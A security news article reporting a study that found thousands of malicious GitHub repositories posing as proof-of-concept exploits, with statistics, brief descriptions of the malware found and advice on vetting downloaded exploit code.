Hidden Malware in Fake GitHub PoCs: Researchers Find 4,893 Malicious Repos

Data Collection and Analysis

Researchers at the Leiden Institute of Advanced Computer Science examined more than 47,300 GitHub repositories that contained proof‑of‑concept (PoC) code for vulnerabilities disclosed between 2017 and 2021. They applied three analysis mechanisms:

IP address analysis – comparing the IP addresses of PoC publishers with public blocklists and with VirusTotal and AbuseIPDB entries.

Binary analysis – submitting provided executables and their hashes to VirusTotal.

Hexadecimal and Base64 analysis – decoding obfuscated files before performing the binary and IP checks.

The study identified 150,734 unique IP addresses; 2,864 matched blocklist entries, 1,522 were flagged as malicious by VirusTotal, and 1,069 appeared in the AbuseIPDB database. Binary analysis of 6,160 executables uncovered 2,164 malicious samples hosted across 1,398 repositories.

Overall, 4,893 of the 47,313 examined repositories were classified as malicious, most of them linked to 2020 vulnerabilities. A subset of these repositories contained fake PoCs that were used to distribute malware. The researchers documented at least 60 live examples that GitHub is in the process of removing.

Malware in PoCs

Detailed case studies revealed a variety of malicious payloads hidden in PoCs:

A fake PoC for CVE‑2019‑0708 (BlueKeep) contained a Base64‑obfuscated Python script that fetched a VBScript from Pastebin. The script was the Houdini RAT, a JavaScript‑based trojan capable of executing remote commands via Windows CMD.

Another PoC acted as an information‑stealer, collecting system details, IP addresses, and user‑agent strings.

PowerShell PoCs included Base64‑encoded binaries flagged as malicious by VirusTotal.

Python PoCs often consisted of a single line that decoded a malicious Base64 payload.

The fabricated BlueKeep PoC bundled an executable identified as Cobalt Strike, with additional hidden scripts that, while inactive, could be weaponized.

How to Stay Safe

Blindly trusting unverified GitHub repositories is unsafe because their content is not vetted. Security testers should thoroughly examine any downloaded PoC before execution and follow these three steps:

Carefully review the code that will run on the network.

If the code is heavily obfuscated or requires extensive manual analysis, test it in an isolated environment such as a sandboxed virtual machine and monitor network traffic for suspicious activity.

Use open‑source intelligence tools like VirusTotal to analyze binaries.

The researchers have reported all identified malicious repositories to GitHub, but removal can take time, leaving many repositories publicly accessible for the meantime.

Source: https://www.bleepingcomputer.com/news/security/thousands-of-github-repositories-deliver-fake-poc-exploits-with-malware/